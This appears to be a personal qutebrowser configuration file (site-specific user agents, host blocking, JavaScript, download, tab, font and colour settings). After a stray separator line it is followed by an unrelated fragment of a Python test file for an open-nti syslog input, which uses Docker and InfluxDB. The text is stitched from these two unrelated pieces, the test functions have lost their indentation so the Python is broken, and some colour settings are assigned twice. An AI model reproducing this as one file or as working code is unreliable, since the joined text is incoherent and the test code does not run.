# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# Enable host blocking.
# Type: Bool
c.content.host_blocking.enabled = True
# List of URLs of lists which contain hosts to block. The file can be
# in one of the following formats: - An `/etc/hosts`-like file - One
# host per line - A zip-file of any of the above, with either only one
# file, or a file named `hosts` (with any extension). It's also
# possible to add a local file or directory via a `file://` URL. In case
# of a directory, all files in the directory are read as adblock lists.
# The file `~/.config/qutebrowser/blocked-hosts` is always read if it
# exists.
# Type: List of Url
c.content.host_blocking.lists = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts']
# A list of patterns that should always be loaded, despite being ad-
# blocked. Note this whitelists blocked hosts, not first-party URLs. As
# an example, if `example.org` loads an ad from `ads.example.org`, the
# whitelisted host should be `ads.example.org`. If you want to disable
# the adblocker on a given page, use the `content.host_blocking.enabled`
# setting with a URL pattern instead. Local domains are always exempt
# from hostblocking.
# Type: List of UrlPattern
c.content.host_blocking.whitelist = ['piwik.org']
# Enable hyperlink auditing (`<a ping>`).
# Type: Bool
c.content.hyperlink_auditing = False
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'devtools://*')
# Load images automatically in web pages.
# Type: Bool
c.content.images = True
# Show javascript alerts.
# Type: Bool
c.content.javascript.alert = True
# Allow JavaScript to read from or write to the clipboard. With
# QtWebEngine, writing the clipboard as response to a user interaction
# is always allowed.
# Type: Bool
c.content.javascript.can_access_clipboard = False
# Allow JavaScript to open new tabs without user interaction.
# Type: Bool
c.content.javascript.can_open_tabs_automatically = False
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome-devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome://*/*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'qute://*/*')
# Enable JavaScript.
# Type: Bool
c.content.javascript.enabled = True
# Log levels to use for JavaScript console logging messages. When a
# JavaScript message with the level given in the dictionary key is
# logged, the corresponding dictionary value selects the qutebrowser
# logger to use. On QtWebKit, the "unknown" setting is always used. The
# following levels are valid: `none`, `debug`, `info`, `warning`,
# `error`.
# Type: Dict
c.content.javascript.log = {'error': 'debug', 'warning': 'debug', 'unknown': 'debug', 'info': 'debug'}
# Use the standard JavaScript modal dialog for `alert()` and
# `confirm()`.
# Type: Bool
c.content.javascript.modal_dialog = False
# Show javascript prompts.
# Type: Bool
c.content.javascript.prompt = True
# Allow locally loaded documents to access remote URLs.
# Type: Bool
c.content.local_content_can_access_remote_urls = False
# Allow locally loaded documents to access other local URLs.
# Type: Bool
c.content.local_content_can_access_file_urls = True
# Enable support for HTML 5 local storage and Web SQL.
# Type: Bool
c.content.local_storage = True
# Netrc-file for HTTP authentication. If unset, `~/.netrc` is used.
# Type: File
c.content.netrc_file = None
# Allow pdf.js to view PDF files in the browser. Note that the files can
# still be downloaded by clicking the download button in the pdf.js
# viewer.
# Type: Bool
c.content.pdfjs = True
# Allow websites to request persistent storage quota via
# `navigator.webkitPersistentStorage.requestQuota`.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.persistent_storage = 'ask'
# Enable plugins in Web pages.
# Type: Bool
c.content.plugins = True
# Draw the background color and images also when the page is printed.
# Type: Bool
c.content.print_element_backgrounds = True
# Open new windows in private browsing mode which does not record
# visited pages.
# Type: Bool
c.content.private_browsing = False
# Proxy to use. In addition to the listed values, you can use a
# `socks://...` or `http://...` URL. Note that with QtWebEngine, it will
# take a couple of seconds until the change is applied, if this value is
# changed at runtime.
# Type: Proxy
# Valid values:
# - system: Use the system wide proxy.
# - none: Don't use any proxy
c.content.proxy = 'system'
# Validate SSL handshakes.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.ssl_strict = 'ask'
# List of user stylesheet filenames to use.
# Type: List of File, or File
c.content.user_stylesheets = []
# Enable WebGL.
# Type: Bool
c.content.webgl = True
# Monitor load requests for cross-site scripting attempts. Suspicious
# scripts will be blocked and reported in the devtools JavaScript
# console. Note that bypasses for the XSS auditor are widely known and
# it can be abused for cross-site info leaks in some scenarios, see:
# https://www.chromium.org/developers/design-documents/xss-auditor
# Type: Bool
c.content.xss_auditing = True
# Height (in pixels or as percentage of the window) of the completion.
# Type: PercOrInt
c.completion.height = '25%'
# Move on to the next part when there's only one possible completion
# left.
# Type: Bool
c.completion.quick = True
# When to show the autocompletion window.
# Type: String
# Valid values:
# - always: Whenever a completion is available.
# - auto: Whenever a completion is requested.
# - never: Never.
c.completion.show = 'always'
# Shrink the completion to be smaller than the configured size if there
# are no scrollbars.
# Type: Bool
c.completion.shrink = True
# Width (in pixels) of the scrollbar in the completion window.
# Type: Int
c.completion.scrollbar.width = 12
# Padding (in pixels) of the scrollbar handle in the completion window.
# Type: Int
c.completion.scrollbar.padding = 2
# Format of timestamps (e.g. for the history completion). See
# https://sqlite.org/lang_datefunc.html for allowed substitutions.
# Type: String
c.completion.timestamp_format = '%d/%m'
# Delay (in milliseconds) before updating completions after typing a
# character.
# Type: Int
c.completion.delay = 0
# Minimum amount of characters needed to update completions.
# Type: Int
c.completion.min_chars = 1
# Execute the best-matching command on a partial match.
# Type: Bool
c.completion.use_best_match = False
# Directory to save downloads to. If unset, a sensible OS-specific
# default is used.
# Type: Directory
c.downloads.location.directory = '/home/jagreen/dld'
# Prompt the user for the download location. If set to false,
# `downloads.location.directory` will be used.
# Type: Bool
c.downloads.location.prompt = False
# Remember the last used download directory.
# Type: Bool
c.downloads.location.remember = True
# What to display in the download filename input.
# Type: String
# Valid values:
# - path: Show only the download path.
# - filename: Show only download filename.
# - both: Show download path and filename.
c.downloads.location.suggestion = 'path'
# Default program used to open downloads. If null, the default internal
# handler is used. Any `{}` in the string will be expanded to the
# filename, else the filename will be appended.
# Type: String
c.downloads.open_dispatcher = None
# Where to show the downloaded files.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.downloads.position = 'top'
# Duration (in milliseconds) to wait before removing finished downloads.
# If set to -1, downloads are never removed.
# Type: Int
c.downloads.remove_finished = 50
# Editor (and arguments) to use for the `open-editor` command. The
# following placeholders are defined: * `{file}`: Filename of the file
# to be edited. * `{line}`: Line in which the caret is found in the
# text. * `{column}`: Column in which the caret is found in the text. *
# `{line0}`: Same as `{line}`, but starting from index 0. * `{column0}`:
# Same as `{column}`, but starting from index 0.
# Type: ShellCommand
c.editor.command = ['nvim', '{file}']
# Encoding to use for the editor.
# Type: Encoding
c.editor.encoding = 'utf-8'
# When a hint can be automatically followed without pressing Enter.
# Type: String
# Valid values:
# - always: Auto-follow whenever there is only a single hint on a page.
# - unique-match: Auto-follow whenever there is a unique non-empty match in either the hint string (word mode) or filter (number mode).
# - full-match: Follow the hint when the user typed the whole hint (letter, word or number mode) or the element's text (only in number mode).
# - never: The user will always need to press Enter to follow a hint.
c.hints.auto_follow = 'unique-match'
# Duration (in milliseconds) to ignore normal-mode key bindings after a
# successful auto-follow.
# Type: Int
c.hints.auto_follow_timeout = 0
# CSS border value for hints.
# Type: String
c.hints.border = '1px solid #dadada'
# Characters used for hint strings.
# Type: UniqueCharString
c.hints.chars = 'asdfghjkl'
# Dictionary file to be used by the word hints.
# Type: File
c.hints.dictionary = '/usr/share/dict/words'
# Hide unmatched hints in rapid mode.
# Type: Bool
c.hints.hide_unmatched_rapid_hints = True
# Minimum number of characters used for hint strings.
# Type: Int
c.hints.min_chars = 1
# Mode to use for hints.
# Type: String
# Valid values:
# - number: Use numeric hints. (In this mode you can also type letters from the hinted element to filter and reduce the number of elements that are hinted.)
# - letter: Use the characters in the `hints.chars` setting.
# - word: Use hints words based on the html elements and the extra words.
c.hints.mode = 'letter'
# Comma-separated list of regular expressions to use for 'next' links.
# Type: List of Regex
c.hints.next_regexes = ['\\bnext\\b', '\\bmore\\b', '\\bnewer\\b', '\\b[>→≫]\\b', '\\b(>>|»)\\b', '\\bcontinue\\b']
# Comma-separated list of regular expressions to use for 'prev' links.
# Type: List of Regex
c.hints.prev_regexes = ['\\bprev(ious)?\\b', '\\bback\\b', '\\bolder\\b', '\\b[<←≪]\\b', '\\b(<<|«)\\b']
# Scatter hint key chains (like Vimium) or not (like dwb). Ignored for
# number hints.
# Type: Bool
c.hints.scatter = True
# Make characters in hint strings uppercase.
# Type: Bool
c.hints.uppercase = False
# Allow Escape to quit the crash reporter.
# Type: Bool
c.input.escape_quits_reporter = True
# Automatically enter insert mode if an editable element is focused
# after loading the page.
# Type: Bool
c.input.insert_mode.auto_load = True
# Enter insert mode if an editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_enter = True
# Leave insert mode if a non-editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_leave = True
# Switch to insert mode when clicking flash and other plugins.
# Type: Bool
c.input.insert_mode.plugins = False
# Include hyperlinks in the keyboard focus chain when tabbing.
# Type: Bool
c.input.links_included_in_focus_chain = True
# Timeout (in milliseconds) for partially typed key bindings. If the
# current input forms only partial matches, the keystring will be
# cleared after this time.
# Type: Int
c.input.partial_timeout = 5000
# Enable spatial navigation. Spatial navigation consists in the ability
# to navigate between focusable elements in a Web page, such as
# hyperlinks and form controls, by using Left, Right, Up and Down arrow
# keys. For example, if the user presses the Right key, heuristics
# determine whether there is an element he might be trying to reach
# towards the right and which element he probably wants.
# Type: Bool
c.input.spatial_navigation = False
# Rounding radius (in pixels) for the edges of the keyhint dialog.
# Type: Int
c.keyhint.radius = 6
# Time (in milliseconds) from pressing a key to seeing the keyhint
# dialog.
# Type: Int
c.keyhint.delay = 500
# Duration (in milliseconds) to show messages in the statusbar for. Set
# to 0 to never clear messages.
# Type: Int
c.messages.timeout = 5000
# Show a filebrowser in download prompts.
# Type: Bool
c.prompt.filebrowser = True
# Rounding radius (in pixels) for the edges of prompts.
# Type: Int
c.prompt.radius = 8
# Enable smooth scrolling for web pages. Note smooth scrolling does not
# work with the `:scroll-px` command.
# Type: Bool
c.scrolling.smooth = True
# Languages to use for spell checking. You can check for available
# languages and install dictionaries using scripts/dictcli.py. Run the
# script with -h/--help for instructions.
# Type: List of String
# Valid values:
# - af-ZA: Afrikaans (South Africa)
# - bg-BG: Bulgarian (Bulgaria)
# - ca-ES: Catalan (Spain)
# - cs-CZ: Czech (Czech Republic)
# - da-DK: Danish (Denmark)
# - de-DE: German (Germany)
# - el-GR: Greek (Greece)
# - en-AU: English (Australia)
# - en-CA: English (Canada)
# - en-GB: English (United Kingdom)
# - en-US: English (United States)
# - es-ES: Spanish (Spain)
# - et-EE: Estonian (Estonia)
# - fa-IR: Farsi (Iran)
# - fo-FO: Faroese (Faroe Islands)
# - fr-FR: French (France)
# - he-IL: Hebrew (Israel)
# - hi-IN: Hindi (India)
# - hr-HR: Croatian (Croatia)
# - hu-HU: Hungarian (Hungary)
# - id-ID: Indonesian (Indonesia)
# - it-IT: Italian (Italy)
# - ko: Korean
# - lt-LT: Lithuanian (Lithuania)
# - lv-LV: Latvian (Latvia)
# - nb-NO: Norwegian (Norway)
# - nl-NL: Dutch (Netherlands)
# - pl-PL: Polish (Poland)
# - pt-BR: Portuguese (Brazil)
# - pt-PT: Portuguese (Portugal)
# - ro-RO: Romanian (Romania)
# - ru-RU: Russian (Russia)
# - sh: Serbo-Croatian
# - sk-SK: Slovak (Slovakia)
# - sl-SI: Slovenian (Slovenia)
# - sq: Albanian
# - sr: Serbian
# - sv-SE: Swedish (Sweden)
# - ta-IN: Tamil (India)
# - tg-TG: Tajik (Tajikistan)
# - tr-TR: Turkish (Turkey)
# - uk-UA: Ukrainian (Ukraine)
# - vi-VN: Vietnamese (Viet Nam)
c.spellcheck.languages = ['en-GB']
# Padding (in pixels) for the statusbar.
# Type: Padding
c.statusbar.padding = {'top': 1, 'left': 0, 'bottom': 1, 'right': 0}
# Position of the status bar.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.statusbar.position = 'bottom'
# List of widgets displayed in the statusbar.
# Type: List of String
# Valid values:
# - url: Current page URL.
# - scroll: Percentage of the current page position like `10%`.
# - scroll_raw: Raw percentage of the current page position like `10`.
# - history: Display an arrow when possible to go back/forward in history.
# - tabs: Current active tab, e.g. `2`.
# - keypress: Display pressed keys when composing a vi command.
# - progress: Progress bar for the current page loading.
c.statusbar.widgets = ['keypress', 'url', 'scroll', 'history', 'tabs', 'progress']
# Open new tabs (middleclick/ctrl+click) in the background.
# Type: Bool
c.tabs.background = True
# Mouse button with which to close tabs.
# Type: String
# Valid values:
# - right: Close tabs on right-click.
# - middle: Close tabs on middle-click.
# - none: Don't close tabs using the mouse.
c.tabs.close_mouse_button = 'middle'
# How to behave when the close mouse button is pressed on the tab bar.
# Type: String
# Valid values:
# - new-tab: Open a new tab.
# - close-current: Close the current tab.
# - close-last: Close the last tab.
# - ignore: Don't do anything.
c.tabs.close_mouse_button_on_bar = 'new-tab'
# Scaling factor for favicons in the tab bar. The tab size is unchanged,
# so big favicons also require extra `tabs.padding`.
# Type: Float
c.tabs.favicons.scale = 1.0
# When to show favicons in the tab bar.
# Type: String
# Valid values:
# - always: Always show favicons.
# - never: Always hide favicons.
# - pinned: Show favicons only on pinned tabs.
c.tabs.favicons.show = 'never'
# How to behave when the last tab is closed.
# Type: String
# Valid values:
# - ignore: Don't do anything.
# - blank: Load a blank page.
# - startpage: Load the start page.
# - default-page: Load the default page.
# - close: Close the window.
c.tabs.last_close = 'startpage'
# Switch between tabs using the mouse wheel.
# Type: Bool
c.tabs.mousewheel_switching = True
# Position of new tabs opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.related = 'next'
# Position of new tabs which are not opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.unrelated = 'last'
# Padding (in pixels) around text for tabs.
# Type: Padding
c.tabs.padding = {'top': 0, 'left': 5, 'bottom': 0, 'right': 5}
# When switching tabs, what input mode is applied.
# Type: String
# Valid values:
# - persist: Retain the current mode.
# - restore: Restore previously saved mode.
# - normal: Always revert to normal mode.
c.tabs.mode_on_change = 'normal'
# Position of the tab bar.
# Type: Position
# Valid values:
# - top
# - bottom
# - left
# - right
c.tabs.position = 'top'
# Which tab to select when the focused tab is removed.
# Type: SelectOnRemove
# Valid values:
# - prev: Select the tab which came before the closed one (left in horizontal, above in vertical).
# - next: Select the tab which came after the closed one (right in horizontal, below in vertical).
# - last-used: Select the previously selected tab.
c.tabs.select_on_remove = 'next'
# When to show the tab bar.
# Type: String
# Valid values:
# - always: Always show the tab bar.
# - never: Always hide the tab bar.
# - multiple: Hide the tab bar if only one tab is open.
# - switching: Show the tab bar when switching tabs.
c.tabs.show = 'always'
# Alignment of the text inside of tabs.
# Type: TextAlignment
# Valid values:
# - left
# - right
# - center
c.tabs.title.alignment = 'left'
# Format to use for the tab title for pinned tabs. The same placeholders
# like for `tabs.title.format` are defined.
# Type: FormatString
c.tabs.title.format_pinned = '{index}'
# Width (in pixels or as percentage of the window) of the tab bar if
# it's vertical.
# Type: PercOrInt
c.tabs.width = '20%'
# Width (in pixels) of the progress indicator (0 to disable).
# Type: Int
c.tabs.indicator.width = 3
# Padding (in pixels) for tab indicators.
# Type: Padding
c.tabs.indicator.padding = {'top': 2, 'left': 0, 'bottom': 2, 'right': 4}
# Shrink pinned tabs down to their contents.
# Type: Bool
c.tabs.pinned.shrink = True
# Wrap when changing tabs.
# Type: Bool
c.tabs.wrap = True
# What search to start when something else than a URL is entered.
# Type: String
# Valid values:
# - naive: Use simple/naive check.
# - dns: Use DNS requests (might be slow!).
# - never: Never search automatically.
# - schemeless: Always search automatically unless URL explicitly contains a scheme.
c.url.auto_search = 'naive'
# Page to open if :open -t/-b/-w is used without URL. Use `about:blank`
# for a blank page.
# Type: FuzzyUrl
c.url.default_page = 'file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html'
# Open base URL of the searchengine if a searchengine shortcut is
# invoked without parameters.
# Type: Bool
c.url.open_base_url = True
# Search engines which can be used via the address bar. Maps a search
# engine name (such as `DEFAULT`, or `ddg`) to a URL with a `{}`
# placeholder. The placeholder will be replaced by the search term, use
# `{{` and `}}` for literal `{`/`}` braces. The following further
# placeholds are defined to configure how special characters in the
# search terms are replaced by safe characters (called 'quoting'): *
# `{}` and `{semiquoted}` quote everything except slashes; this is the
# most sensible choice for almost all search engines (for the search
# term `slash/and&` this placeholder expands to `slash/and%26amp`).
# * `{quoted}` quotes all characters (for `slash/and&` this
# placeholder expands to `slash%2Fand%26amp`). * `{unquoted}` quotes
# nothing (for `slash/and&` this placeholder expands to
# `slash/and&`). The search engine named `DEFAULT` is used when
# `url.auto_search` is turned on and something else than a URL was
# entered to be opened. Other search engines can be used by prepending
# the search engine name to the search term, e.g. `:open google
# qutebrowser`.
# Type: Dict
c.url.searchengines = {'DEFAULT': 'https://www.google.com/search?q={}', 'google': 'https://www.google.com/search?q={}'}
# Page(s) to open at the start.
# Type: List of FuzzyUrl, or FuzzyUrl
c.url.start_pages = ['file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html']
# URL parameters to strip with `:yank url`.
# Type: List of String
c.url.yank_ignored_parameters = ['ref', 'utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']
# Hide the window decoration. This setting requires a restart on
# Wayland.
# Type: Bool
c.window.hide_decoration = False
# Default zoom level.
# Type: Perc
c.zoom.default = '75%'
# Available zoom levels.
# Type: List of Perc
c.zoom.levels = ['25%', '33%', '50%', '67%', '75%', '90%', '100%', '110%', '125%', '150%', '175%', '200%', '250%', '300%', '400%', '500%']
# Number of zoom increments to divide the mouse wheel movements to.
# Type: Int
c.zoom.mouse_divider = 512
# Text color of the completion widget. May be a single color to use for
# all columns or a list of three colors, one for each column.
# Type: List of QtColor, or QtColor
c.colors.completion.fg = ['#dadada', '#dadada', '#dadada']
# Background color of the completion widget for odd rows.
# Type: QssColor
c.colors.completion.odd.bg = '#404552'
# Background color of the completion widget for even rows.
# Type: QssColor
c.colors.completion.even.bg = '#404552'
# Foreground color of completion widget category headers.
# Type: QtColor
c.colors.completion.category.fg = '#dadada'
# Background color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.bg = '#3a3f4d'
# Top border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.top = '#3a3f4d'
# Bottom border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.bottom = '#3a3f4d'
# Foreground color of the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.fg = '#000000'
# Background color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.bg = '#8ba870'
# Top border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.top = '#8ba870'
# Bottom border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.bottom = '#8ba870'
# Foreground color of the matched text in the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.match.fg = '#000000'
# Foreground color of the matched text in the completion.
# Type: QtColor
c.colors.completion.match.fg = '#dadada'
# Color of the scrollbar handle in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.fg = '#404552'
# Color of the scrollbar in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.bg = '#3a3f4d'
# Color gradient interpolation system for download text.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'rgb'
# Color gradient interpolation system for download backgrounds.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'none'
c.colors.downloads.system.bg = 'none'
c.colors.downloads.start.fg = '#dadada'
c.colors.downloads.start.bg = '#968665'
c.colors.downloads.start.fg = '#000000'
c.colors.downloads.start.bg = '#8ba870'
# Foreground color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.fg = '#dadada'
# Background color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.bg = '#966575'
# Font color for hints.
# Type: QssColor
c.colors.hints.fg = '#dadada'
# Background color for hints. Note that you can use a `rgba(...)` value
# for transparency.
# Type: QssColor
c.colors.hints.bg = '#404552'
# Font color for the matched part of hints.
# Type: QtColor
c.colors.hints.match.fg = '#e0be80'
# Highlight color for keys to complete the current keychain.
# Type: QssColor
c.colors.keyhint.suffix.fg = 'purple'
# Foreground color of an error message.
# Type: QssColor
c.colors.messages.error.fg = '#dadada'
# Background color of an error message.
# Type: QssColor
c.colors.messages.error.bg = '#966575'
# Border color of an error message.
# Type: QssColor
c.colors.messages.error.border = '#966575'
# Foreground color of a warning message.
# Type: QssColor
c.colors.messages.warning.fg = '#dadada'
# Background color of a warning message.
# Type: QssColor
c.colors.messages.warning.bg = '#968665'
# Border color of a warning message.
# Type: QssColor
c.colors.messages.warning.border = '#968665'
# Foreground color of an info message.
# Type: QssColor
c.colors.messages.info.fg = '#dadada'
# Background color of an info message.
# Type: QssColor
c.colors.messages.info.bg = '#657596'
# Border color of an info message.
# Type: QssColor
c.colors.messages.info.border = '#657596'
# Foreground color for prompts.
# Type: QssColor
c.colors.prompts.fg = '#dadada'
# Background color for prompts.
# Type: QssColor
c.colors.prompts.bg = '#404552'
# Foreground color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.fg = '#dadada'
# Background color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.bg = '#404552'
# Foreground color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.fg = '#000000'
# Background color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.bg = '#8ba870'
# Foreground color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.fg = '#dadada'
# Background color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.bg = '#5e8d87'
# Foreground color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.fg = '#dadada'
# Background color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.bg = '#383c4a'
# Foreground color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.fg = '#dadada'
# Background color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.bg = '#404552'
# Foreground color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.fg = '#dadada'
# Background color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.bg = '#383c4a'
# Foreground color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.fg = '#dadada'
# Background color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.bg = '#966894'
# Foreground color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.fg = '#dadada'
# Background color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.bg = '#b294bb'
# Background color of the progress bar.
# Type: QssColor
c.colors.statusbar.progress.bg = '#383c4a'
# Default foreground color of the URL in the statusbar.
# Type: QssColor
c.colors.statusbar.url.fg = '#dadada'
# Foreground color of the URL in the statusbar on error.
# Type: QssColor
c.colors.statusbar.url.error.fg = '#966575'
# Foreground color of the URL in the statusbar for hovered links.
# Type: QssColor
c.colors.statusbar.url.hover.fg = '#657596'
# Foreground color of the URL in the statusbar on successful load
# (http).
# Type: QssColor
c.colors.statusbar.url.success.http.fg = '#dadada'
# Foreground color of the URL in the statusbar on successful load
# (https).
# Type: QssColor
c.colors.statusbar.url.success.https.fg = '#8ba870'
# Foreground color of the URL in the statusbar when there's a warning.
# Type: QssColor
c.colors.statusbar.url.warn.fg = '#968665'
# Background color of the tab bar.
# Type: QssColor
c.colors.tabs.bar.bg = '#404552'
# Color for the tab indicator on errors.
# Type: QtColor
c.colors.tabs.indicator.error = '#966575'
c.colors.tabs.indicator.start = '#968665'
c.colors.tabs.indicator.stop = '#8ba870'
c.colors.tabs.indicator.system = 'none'
# Foreground color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.fg = '#dadada'
# Background color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.bg = '#3a3f4d'
# Foreground color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.fg = '#dadada'
# Background color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.bg = '#3a3f4d'
# Foreground color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.fg = '#dadada'
# Background color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.bg = '#404552'
# Foreground color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.fg = '#dadada'
# Background color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.bg = '#404552'
# Background color for webpages if unset (or empty to use the theme's
# color).
# Type: QtColor
c.colors.webpage.bg = 'white'
# Default font families to use.
# Type: Font
c.fonts.default_family = 'Inconsolata Nerd Font Mono'
# Default font size to use.
# Type: String
c.fonts.default_size = '8pt'
# Font used in the completion widget.
# Type: Font
c.fonts.completion.entry = 'default_size default_family'
# Font used in the completion categories.
# Type: Font
c.fonts.completion.category = 'default_size default_family'
# Font used for the debugging console.
# Type: Font
c.fonts.debug_console = 'default_size default_family'
# Font used for the downloadbar.
# Type: Font
c.fonts.downloads = 'default_size default_family'
# Font used for the hints.
# Type: Font
c.fonts.hints = 'default_size default_family'
# Font used in the keyhint widget.
# Type: Font
c.fonts.keyhint = 'default_size default_family'
# Font used for error messages.
# Type: Font
c.fonts.messages.error = 'default_size default_family'
# Font used for info messages.
# Type: Font
c.fonts.messages.info = 'default_size default_family'
# Font used for warning messages.
# Type: Font
c.fonts.messages.warning = 'default_size default_family'
# Font used for prompts.
# Type: Font
c.fonts.prompts = 'default_size default_family'
# Font used in the statusbar.
# Type: Font
c.fonts.statusbar = 'default_size default_family'
# This setting can be used to map keys to other keys. When the key used
# as dictionary-key is pressed, the binding for the key used as
# dictionary-value is invoked instead. This is useful for global
# remappings of keys, for example to map Ctrl-[ to Escape. Note that
# when a key is bound (via `bindings.default` or `bindings.commands`),
# the mapping is ignored.
# Type: Dict
c.bindings.key_mappings = {'<Ctrl+[>': '<Escape>', '<Ctrl+6>': '<Ctrl+^>', '<Ctrl+m>': '<Return>', '<Enter>': '<Return>', '<Shift+Enter>': '<Return>', '<Ctrl+Enter>': '<Ctrl+Return>', '<Ctrl+j>': '<Return>', '<Shift+Return>': '<Return>'}
| nilq/baby-python | python |
from docker import Client
import open_nti_input_syslog_lib
import docker.tls as tls
import influxdb
import time
from os import path
import os
import shutil
import pprint
import subprocess
import json
import os.path
from sys import platform as _platform
import time
import requests
import filecmp
import sys
from kafka import KafkaConsumer
from timeout import timeout
################################################################################
def test_connect_docker():
c = open_nti_input_syslog_lib.check_docker()
# Check if connection to Docker work by listing all images
list_images = c.images()
assert len(list_images) >= 1
def test_start_dependancies():
open_nti_input_syslog_lib.start_open_nti()
assert open_nti_input_syslog_lib.check_influxdb_running_database_exist()
